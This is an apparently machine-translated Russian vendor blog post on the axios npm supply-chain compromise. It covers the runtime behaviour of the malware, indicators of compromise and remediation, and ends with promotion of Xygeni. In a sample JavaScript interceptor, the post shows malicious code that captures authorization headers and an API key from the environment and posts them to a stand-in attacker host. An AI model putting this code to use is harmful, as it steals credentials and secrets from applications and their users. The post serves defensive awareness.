Компромисс в Axios npm: что произошло

TL, д-р

Компромисс npm в Axios показывает как современные атаки на цепочки поставок Использование доверенных зависимостей для доступа к конфиденциальным данным во время выполнения. Этот инцидент был проанализирован несколькими исследователями безопасности, включая подробные разборы на основе... Unit42 Обзор отрасли, освещающий закономерности атрибуции, связанные с деятельностью национальных государств.

Данный инцидент затрагивает:

Команды DevOps работают CI/CD pipelineс аутентификацией на основе среды
Серверные службы обрабатывают аутентифицированные API-запросы
Приложения, использующие xios для внутренней и внешней HTTP-связи.

Поскольку axios находится на уровне обработки запросов, скомпрометированная версия может получить доступ к:

Заголовки авторизации и API-токены
Переменные среды и секреты
Внутренняя служебная коммуникация

Реальное влияние оказывает не сама зависимость, а то, к чему она сможет получить доступ после выполнения.

Немедленные действия:

Заблокируйте версии зависимостей и ознакомьтесь с последними обновлениями.
Меняйте ключи API, токены и CI/CD Полномочия
Отслеживайте исходящие запросы и активность аутентификации.
Аудит pipelines для раскрытых секретов

Что произошло во время атаки на Axios npm?

Инцидент с Axios является частью растущей тенденции в атаках на цепочки поставок, когда злоумышленники нацеливаются на широко используемые зависимости, а не на уязвимости приложений.

Взломав доверенный пакет, злоумышленники получают возможность выполнять атаки одновременно в тысячах сред.

Поскольку axios является одним из наиболее широко используемых HTTP-клиентов в экосистеме JavaScript, он глубоко интегрирован в:

Бэкэнд-услуги
Фронтенд-приложения
CI/CD pipelines

Это делает его очень ценной целью.

После внедрения и запуска вредоносной версии она наследует те же права доступа, что и приложение, которое её загрузило. Это включает доступ к сетевому трафику, учетным данным и внутренним службам.

Компромисс привлёк более широкое внимание за пределами сообщества специалистов по безопасности, о чём свидетельствуют публикации, например, на сайте Axios. охват
это указывает на возможные связи с продвинутыми субъектами, осуществляющими киберугрозы, и на скоординированные кампании.

Что на самом деле делает атака Axios во время выполнения

Ключ к пониманию этой атаки заключается в анализе поведения во время выполнения.

Axios работает на уровне HTTP, что означает, что он обрабатывает исходящие запросы. Это обеспечивает ему прямой доступ к конфиденциальным данным, проходящим через приложение.

Компромиссная версия может:

Перехватывайте исходящие запросы до их отправки.
захват Authorization заголовки и токены API
Доступ к переменным среды осуществляется через process.env
Отслеживайте взаимодействие между внутренними службами.

Например, вредоносный перехватчик может извлекать заголовки аутентификации и незаметно пересылать их на внешнюю конечную точку.

В то же время доступ к переменным окружения позволяет злоумышленникам получать учетные данные, не изменяя логику приложения.

Внешне всё работает как положено. Запросы успешно обрабатываются, сервисы отвечают нормально, и pipelineПризнаков сбоя не наблюдается. В то же время, конфиденциальные данные могут быть уже доступны через фоновые пути выполнения.

Схема атаки Axios: от взлома пакета до раскрытия секретной информации.

1. Компромисс

Злоумышленник получает контроль над доверенной учетной записью сопровождающего или путем выпуска пакетов внутри экосистемы axios.

→

2. распределение

Вредоносные версии публикуются в npm и загружаются на компьютеры разработчиков. CI/CD pipelineСборка приложений осуществляется посредством обычных обновлений зависимостей.

→

3. Выполнение во время выполнения

Полезная нагрузка выполняется при импорте и использовании axios, наследуя те же привилегии среды выполнения, что и приложение.

→

4. Секретный доступ

В результате взлома скомпрометированная зависимость получает доступ к заголовкам, токенам, переменным окружения и внутренней HTTP-коммуникации.

→

5. Эксфильтрация

Конфиденциальные данные незаметно отправляются на инфраструктуру, контролируемую злоумышленником, в то время как исходные запросы продолжают обрабатываться в обычном режиме.

Индикаторы компрометации (IoCs)

Для расследования потенциальных угроз командам следует начать с анализа известных индикаторов, связанных с компрометацией axios. В таблице ниже приведено краткое описание наиболее важных сигналов по пакетам, сетевой активности и артефактам хоста.

Как интерпретировать эти индикаторы компрометации

Хотя эти индикаторы полезны, их не следует рассматривать как полноценную стратегию обнаружения.

На практике подобные атаки редко опираются на один-единственный статический сигнал. Домены меняются, полезные нагрузки развиваются, а хеши быстро устаревают. Неизменным остается лишь поведение.

Например, неожиданные исходящие запросы во время обычного выполнения HTTP-запросов могут указывать на утечку данных. Аналогично, использование действительных учетных данных в необычных контекстах часто сигнализирует о том, что секретная информация уже была раскрыта.

На уровне хоста наличие временных скриптов или исполняемых файлов может указывать на активность после эксплуатации уязвимости, особенно в сочетании с сетевыми аномалиями.

Иными словами, индикаторы компрометации помогают подтвердить инцидент.

Однако именно понимание поведения позволяет выявлять его на ранней стадии.

Категория	Индикаторные	Описание
Упаковка	`axios@1.14.1`	шасум: `2553649f2322049666871cea80a5d0d6adc700ca`
Упаковка	`axios@0.30.4`	шасум: `d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71`
Зависимость	`plain-crypto-js@4.2.1`	шасум: `07d889e2dadce6f3910dcbc253317d28ca61c766`
Cеть	`sfrclak[.]com`	Область управления и контроля
Cеть	`142.11.206[.]73`	IP-адреса связанной инфраструктуры
Cеть	`http://sfrclak[.]com:8000/6202033`	Наблюдаемая конечная точка эксфильтрации
MacOS	`/Library/Caches/com.apple.act.mond`	SHA256: `92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a`
Windows	`%PROGRAMDATA%\wt.exe`	Потенциальный артефакт сохранения
Windows	`%TEMP%\6202033.vbs`	Артефакт выполнения на основе скрипта
Windows	`%TEMP%\6202033.ps1`	Полезная нагрузка PowerShell. SHA256: `617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101`
Linux	`/tmp/ld.py`	SHA256: `fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf`

Записка следствия: Эти индикаторы компрометации (IoC) являются полезной отправной точкой для поиска угроз. Однако злоумышленники могут быстро менять домены, полезные нагрузки и артефакты. Поэтому командам следует сопоставлять эти индикаторы с поведенческими сигналами, такими как неожиданный исходящий HTTP-трафик, аномальный доступ к process.envа также необычные обновления зависимостей.

Пример: Как скомпрометированная зависимость npm в Axios может привести к утечке данных.

Чтобы понять, как работает эта атака Axios npm на практике, рассмотрим упрощенный пример.

Axios позволяет разработчикам определять перехватчики запросов. Эти перехватчики автоматически выполняются перед каждым HTTP-запросом.

Вредоносная версия Axios может злоупотреблять этим механизмом:

const axios = require("axios");

// Malicious interceptor injected into dependency
axios.interceptors.request.use((config) => {
    try {
        const sensitiveData = {
            url: config.url,
            method: config.method,
            headers: config.headers,
            token: process.env.API_KEY,
        };

        require("https").request({
            hostname: "attacker-domain.com",
            path: "/collect",
            method: "POST"
        }).end(JSON.stringify(sensitiveData));

    } catch (e) {}

    return config;
});

Почему атака Axios npm опасна

На первый взгляд, всё кажется в порядке. Запрос выполняется успешно, приложение ведёт себя как ожидалось, и pipelineПродолжают проходить без ошибок.

Однако критически важный момент происходит до отправки запроса. В течение этого временного окна выполнения скомпрометированная зависимость может незаметно получить доступ к конфиденциальным данным, таким как заголовки авторизации, токены API, метаданные запроса и переменные среды, и собрать их.

Поскольку эта логика выполняется внутри доверенной библиотеки, расположенной непосредственно в пути HTTP-запроса, она фактически работает с теми же привилегиями, что и само приложение. В результате она может получить доступ к данным, которые обычно защищены от внешних злоумышленников.

Особенно опасно то, что речь идёт не только о доступе к данным, но и об отсутствии видимых последствий. Нет сбоев в работе, нет неудачных запросов и нет никаких непосредственных сигналов о том, что что-то не так. С операционной точки зрения всё продолжает работать как положено.

Между тем, конфиденциальная информация может уже покидать систему через исходящие соединения, которые сливаются с обычным трафиком приложений.

Почему это проблема DevOps в первую очередь

Для команд DevOps этот тип атаки особенно сложно обнаружить, поскольку он органично вписывается в существующие рабочие процессы.

Зависимости устанавливаются автоматически. pipelineПрограммы выполняются в обычном режиме, и никаких непосредственных сбоев не происходит.

В то же время, CI/CD В различных средах часто происходит утечка ценных учетных данных, в том числе:

токены облачных провайдеров
Ключи развертывания
CI/CD секреты аутентификации

В этом контексте скомпрометированная зависимость может получить прямой доступ к этим учетным данным.

Это создает ситуацию, когда все выглядит нормально, в то время как в фоновом режиме осуществляется доступ к конфиденциальным данным.

Реальный риск: раскрытие секретной информации в масштабах предприятия.

Взлом npm-сервера axios выявляет ключевой сдвиг в современных стратегиях атак.

Цель теперь состоит не в использовании уязвимостей, а в получении доступа к действительным учетным данным.

Поскольку современные системы полагаются на аутентификацию на основе окружения, зависимая программа, работающая во время выполнения, может получить доступ к:

API ключи
Сервисные токены
Учетные данные облачного сервиса

Эти учетные данные не нужно взламывать.

Их нужно только использовать.

Это позволяет злоумышленникам перемещаться по сети, получать доступ к сервисам и извлекать данные, используя легитимную аутентификацию.

В результате последствия зависят от того, какие секреты будут раскрыты, а не от способа осуществления атаки.

Почему традиционные инструменты безопасности упускают это из виду

Традиционные подходы с трудом обнаруживают подобные атаки, поскольку они сосредоточены на известных уязвимостях или статических сигнатурах. Однако, как подчеркивается в Анализ OpenAI В случае компрометации инструмента разработчика Axios реальный риск возникает во время выполнения, когда доверенные зависимости взаимодействуют с конфиденциальными данными.

Однако, в случае нарушения целостности зависимости могут отсутствовать какие-либо очевидные признаки.

Может быть:

Нет CVE
Нет вредоносной подписи
Синтаксис не нарушен

В то же время статический анализ не оценивает поведение во время выполнения. Он не может определить, как зависимость взаимодействует с конфиденциальными данными после выполнения.

Это создает разрыв, при котором код кажется безопасным во время анализа, но становится рискованным во время выполнения.

Как обнаружить и предотвратить атаки типа npm, использующие Axios

Для предотвращения подобных атак на Axios npm необходимо перейти от статического анализа к анализу во время выполнения.

Командам необходимо понимать, как ведут себя зависимости, а не только что они содержат.

Этот пакет услуг включает в себя:

Мониторинг доступа к конфиденциальным данным в режиме реального времени.
Выявление секретов до того, как они попадут в хранилища.
Сканирование pipelineи артефакты для раскрытых учетных данных
Наблюдение за исходящей сетевой активностью на предмет аномалий.

Однако одного лишь обнаружения недостаточно.

От выявления к предотвращению: что на самом деле снижает риск?

После подобных инцидентов команды часто сталкиваются с большим количеством потенциально скомпрометированных учетных данных.

Задача состоит не в том, чтобы их найти. Задача в том, чтобы определить, какие из них действительно важны.

Главный вопрос сводится к следующему:

Какие секреты по-прежнему актуальны и могут быть использованы в корыстных целях?

Без проверки команды тратят время на неактивные учетные данные, в то время как реальные риски сохраняются.

Для эффективного реагирования необходимо:

Выявление раскрытых секретов
Проверка, предоставляют ли они по-прежнему доступ.
Быстрое аннулирование или ротация их

Это сокращает время воздействия и сужает окно возможностей для злоумышленника.

Как Xygeni помогает снизить риски в цепочке поставок

Ксигени Эта задача решается путем объединения обнаружения, проверки и устранения в единый рабочий процесс.

Она непрерывно выявляет скрытые секреты в коде. pipelineи артефактов. В то же время, проверяется, остаются ли эти учетные данные активными в среде.

Это позволяет командам сосредоточиться на том, что действительно могут использовать злоумышленники.

После выявления активных секретных данных автоматизированные процессы устранения уязвимостей помогают сократить время их раскрытия за счет отзыва или контролируемой ротации.

В результате реакция становится быстрее и точнее.cisе. и менее разрушительно.

Заключение

Компрометация axios npm отражает эволюцию атак на цепочки поставок.

Злоумышленникам больше не нужно взламывать системы. Они полагаются на доверенные зависимости для доступа к конфиденциальным данным во время выполнения.

Для команд DevOps это означает понимание поведения системы во время выполнения. Для руководителей служб безопасности это означает быстрое и эффективное снижение рисков.

Потому что в современных условиях наибольший риск заключается не в том, что именно будет выполнено.

Это то, к чему осуществляется доступ после запуска программы.

Компрометация Axios npm: что произошло, кто пострадал и как это предотвратить.

Содержание

Обязательно к прочтению посты

Последние интересные публикации